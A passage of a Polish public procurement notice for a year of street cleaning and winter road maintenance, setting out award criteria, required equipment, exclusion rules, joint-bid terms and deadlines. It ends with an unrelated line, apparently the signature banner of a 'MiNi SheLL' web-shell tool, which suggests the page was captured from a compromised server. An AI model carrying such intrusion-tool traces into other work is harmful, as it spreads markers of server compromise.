Klasyfikacją Emisji Spalin 3,4,5 lub 6 - otrzyma dodatkowo 40 punktów,<br/>b)	Jeżeli żaden z pojazdów, z których będzie korzystał wykonawca przy realizacji zamówienia nie posiada Klasyfikacji Emisji Spalin 3,4,5 lub 6 w formularzu ofertowym <br/>w miejscu dotyczącym aspektów środowiskowych należy wpisać 0. Wówczas oferta <br/>w kryterium „aspekty środowiskowe” otrzyma 0 punktów. Jeżeli odpowiednią klasyfikację posiadają 1 lub 2 pojazdy - oferta otrzyma również w tym kryterium 0 punktów. <br/>W sytuacji kiedy Wykonawca wykaże, że posiada 3 lub więcej pojazdów z Klasyfikacją Emisji Spalin 3,4,5 lub 6 i w związku z tym otrzyma punkty w kryterium „aspekty środowiskowe”, zobowiązany będzie realizować przedmiot zamówienia przy wykorzystaniu w pierwszej kolejności tych pojazdów. Niewywiązanie się z tego obowiązku skutkować będzie rozwiązaniem umowy na podstawie § 9 ust. 1 lit. a umowy.<br/><br/>UWAGA:<br/>W celu potwierdzenia spełnienia kryterium „Aspekty środowiskowe” normy emisji spalin, jakie spełniają pojazdy będą sprawdzane na podstawie dokumentu potwierdzającego Klasyfikację Emisji Spalin, tj.: kserokopia dowodu rejestracyjnego, certyfikat EURO, karta pojazdu, oświadczenia producenta pojazdu bądź autoryzowanego przedstawiciela producenta lub świadectwa homologacji.<br/><br/>Wykonawca, którego oferta zostanie oceniona jako najkorzystniejsza, będzie zobowiązany przedstawić zamawiającemu, przed podpisaniem umowy, jeden z wyżej wymienionych dokumentów.<br/> Maksymalna liczba punktów jaką może uzyskać wykonawca w kryterium „Aspekty środowisko-we” wynosi 40 pkt<br/><br/>2.	Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów, przyznanych w każdym z ww. kryteriów, obliczonych wg wzoru:<br/><br/>S = C + A<br/>S - ocena oferty w punktach (suma)<br/>C – liczba punktów za kryterium „cena”<br/>A – liczba punktów za kryterium „aspekty środowiskowe”<br/><br/>3.	Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, zamawiający wybierze ofertę z najniższą ceną lub najniższym kosztem. <br/>4.	Jeżeli nie będzie można dokonać wyboru oferty w sposób, o którym mowa w ust. 2 zamawiający wezwie wykonawców, którzy złożyli oferty, do złożenia w terminie określonym przez zamawiającego ofert dodatkowych zawierających nową cenę lub koszt. <br/>5.	Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen lub kosztów wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekty środowiskowe</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą się ubiegać wykonawcy, którzy:<br/>a) nie podlegają wykluczeniu,<br/>b) spełniają warunki udziału w postępowaniu.<br/>2. Z postępowania o udzielenie zamówienia zamawiający wykluczy wykonawców, w stosunku do których zachodzi<br/>którakolwiek z okoliczności wskazanych w art. 108 ust. 1 Pzp.<br/>3. Zamawiający nie przewiduje wykluczenia wykonawców, w stosunku do których zachodzą okoliczności wskazane w art.<br/>109 ust. 1 Pzp.<br/>4.Ponadto na podstawie art. 1 pkt 3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie<br/>przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 r. poz.<br/>835), z postępowania<br/>o udzielenie zamówienia publicznego wyklucza się wykonawców, o których mowa w art. 7 ust. 1 w/w ustawy. Powyższe<br/>wykluczenie następować będzie na okres trwania ww. okoliczności. W przypadku wykonawcy wykluczonego na podstawie<br/>art. 7 ust. 1 ustawy, zamawiający odrzuca ofertę takiego wykonawcy, odpowiednio do trybu stosowanego do udzielenia<br/>zamówienia publicznego oraz etapu prowadzonego postępowania o udzielenie zamówienia publicznego.<br/>5.O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym - zamawiający nie stawia szczegółowego warunku w tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów -<br/>zamawiający nie stawia szczegółowego warunku w tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej - zamawiający nie stawia szczegółowego warunku w tym zakresie;<br/>4) zdolności technicznej lub zawodowej<br/>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże się posiadaniem następujących narzędzi i urządzeń<br/>niezbędnych do wykonania zamówienia tj.:<br/>a) na całoroczny okres sprzątania:<br/>• 2 zamiatarki mechaniczne wyposażone w zbiornik na zmiotki z czego jedna powinna mieć zbiornik minimum 1,5 m3 oraz<br/>zbiornik wody minimum 500l wody z możliwością zamiatania na szerokości co najmniej 2.400 mm,<br/>• 1 ładowarka,<br/>• 1 pojazd do odbierania odpadów komunalnych zabezpieczony przed niekontrolowanym wydostawaniem się na zewnątrz<br/>odpadów, podczas ich magazynowania, przeładunku, a także transportu,<br/>• 2 kontenery o pojemności od 33 m3 do 40 m3,<br/>• 1 ciągnik z przyczepą,<br/>• 1 ciągnik ogrodniczy wyposażony w urządzenie zamiatające, o całkowitym tonażu nie zagrażającym zniszczeniu<br/>chodników i ścieżek pieszo-rowerowych,<br/>• 2 kosiarki do trawy,<br/>• 3 wykaszarki do trawy;<br/>b) na sprzątanie w okresie zimowym:<br/>• 1 posypywarka o ładowności minimum 4 ton z instalacją zraszającą solanką do zimowego utrzymania dróg,<br/>• 2 posypywarki ciągnione o ładowności min. 2 ton przeznaczone do zimowego utrzymania dróg,<br/>• 2 ciągniki rolnicze wyposażone w pługi śnieżne,<br/>• 1 pług śnieżny zamontowany na samochodzie ciężarowym,<br/>• 1 pług wirowy,<br/>• 1 ciągnik ogrodniczy wyposażony w pług śnieżny o całkowitym tonażu nie zagrażającym zniszczeniu chodników i ścieżek<br/>pieszo-rowerowych,<br/>• 1 pojazd do wywozu śniegu z urządzeniem hakowym,<br/>• 1 ładowarka,<br/>• 2 kontenery o pojemności od 33 m3 do 40 m2<br/>W zakresie wymagań technicznych dotyczących wyposażenia pojazdów należy zapewnić:<br/>- aby konstrukcja pojazdów zabezpieczała przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowała<br/>oddziaływanie czynników atmosferycznych na odpady,<br/>- trwałe i czytelne oznakowanie w widocznym miejscu, nazwą firmy oraz danymi adresowymi i numerami telefonu,<br/>- pojazdy muszą być wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty wykonawca<br/>zobowiązany jest dołączyć oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, o którym<br/>mowa w art. 125 ust. 1 Pzp – załącznik nr 2.<br/>2. Oświadczenie, o którym mowa w ust. 1, stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w<br/>postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe.<br/>3. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o którym mowa w ust. 1 składa każdy z<br/>wykonawców. Oświadczenie to potwierdza spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w<br/>zakresie,<br/>w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4. W przypadku podmiotów udostępniających swoje zasoby, oświadczenie o którym mowa w ust. 1, składa odrębnie podmiot trzeci,<br/>na którego potencjał powołuje się wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim<br/>przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu, spełnianie warunków udziału w postępowaniu w zakresie,<br/>w jakim podmiot udostępnia swoje zasoby wykonawcy – załącznik nr 3.<br/>5.Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym<br/>niż 5 dni od dnia wezwania, aktualnych na dzień złożenia, podmiotowych środków dowodowych, potwierdzających:<br/>1) brak podstaw wykluczenia, tj.:<br/>a) oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie<br/>podstaw wykluczenia<br/>z postępowania wskazanych przez zamawiającego – załącznik nr 6 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz<br/>narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami – załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów rejestrowych, zamawiający żąda od wykonawcy pełnomocnictwa lub innego dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy.<br/>2.	Pełnomocnictwo powinno obejmować swym zakresem umocowanie do złożenia oferty lub złożenia oferty i podpisania umowy. <br/>3.	Pełnomocnictwo powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>1)	postępowania o zamówienie publiczne, którego dotyczy,<br/>2)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>4.	Przepis ust. 1 stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego.<br/>5.	Przepisy ust. 1 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie konsorcjum, spółki cywilnej). <br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego; pełnomocnictwo musi zostać złożone wraz z ofertą.<br/>3.	W przypadku wspólnego ubiegania się o udzielenie zamówienia, wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy, jeżeli zamawiający go żąda.<br/>4.	Wszelka korespondencja wykonawców ubiegających się wspólnie o udzielenie zamówienia prowadzona będzie wyłącznie z ustanowionym pełnomocnikiem.<br/>5.	Przed zawarciem umowy w sprawie udzielenia zamówienia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia będą zobowiązani przedstawić zamawiającemu kopię umowy regulującą współpracę tych wykonawców.<br/>6.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takim przypadku wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, <br/>o którym mowa w art. 117 ust. 4 Pzp, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy – załącznik nr 5 do SWZ.<br/>7.	Składając ofertę wspólnie (art. 58 ustawy Pzp) przez dwóch lub więcej wykonawców należy wpisać dane konsorcjum z zaznaczeniem słowa „konsorcjum”, tak aby z treści tego zapisu jednoznacznie wynikało, kto składa ofertę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Ewentualne zmiany umowy zostały przewidziane w § 7 wzoru umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-10 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1. Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/wabrzezno, tj. na stronie prowadzonego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-10 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-09-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin zakończenia usługi: 12 miesięcy od dnia zawarcia umowy z zastrzeżeniem, iż wykonawca zobowiązuje się<br/>realizować przedmiot umowy nie wcześniej niż od 22 września 2023 roku.<br/>2. 1.	Zamawiający, stosownie do art. 95 Pzp, wymaga zatrudnienia przez wykonawcę lub podwykonawcę na podstawie stosunku pracy wszystkich osób wykonujących czynności <br/>w zakresie realizacji zamówienia, których wykonanie polega na wykonywaniu pracy <br/>w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz. U. z 2022 r. poz. 1510), tj. m.in. wskazane poniżej czynności w trakcie realizacji zamówienia:<br/>1)	bieżące utrzymanie czystości ulic, chodników, parkingów, ażurowych miejsc postoju, pla-ców, ścieżek pieszo-rowerowych, przystanków komunikacji miejskiej, kratek ściekowych wód opadowych w ulicach, <br/>2)	oczyszczanie z liści, śniegu, lodu, błota nawierzchni dróg, chodników, placów, parkingów, ażurowych miejsc postoju, ścieżek pieszo-rowerowych, przystanków komunikacji miej-skiej oraz kratek ściekowych wód opadowych w ulicach, zwalczanie gołoledzi, <br/>3)	usuwanie zalegającego śniegu, <br/>4)	przygotowanie mieszanki solnej oraz napełnianie skrzyń z mieszanką piasku z solą, <br/>5)	rozstawianie specjalistycznego oznakowania w razie potrzeby, <br/>6)	usuwanie chwastów, <br/>7)	obsługa kosiarek i wykaszarek, <br/>8)	wywóz zebranych odpadów do Regionalnej Instalacji Przetwarzania Odpadów Komunal-nych,<br/>9)	przedkładanie szczegółowego raportu z zaangażowanego sprzętu, <br/>10)	obsługa administracyjna, <br/>11)	koordynowanie prac pracowników, <br/>12)	obsługa sprzętu zaangażowanego w wykonanie umowy, <br/>13)	prace ręczne wynikające z zakresu umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com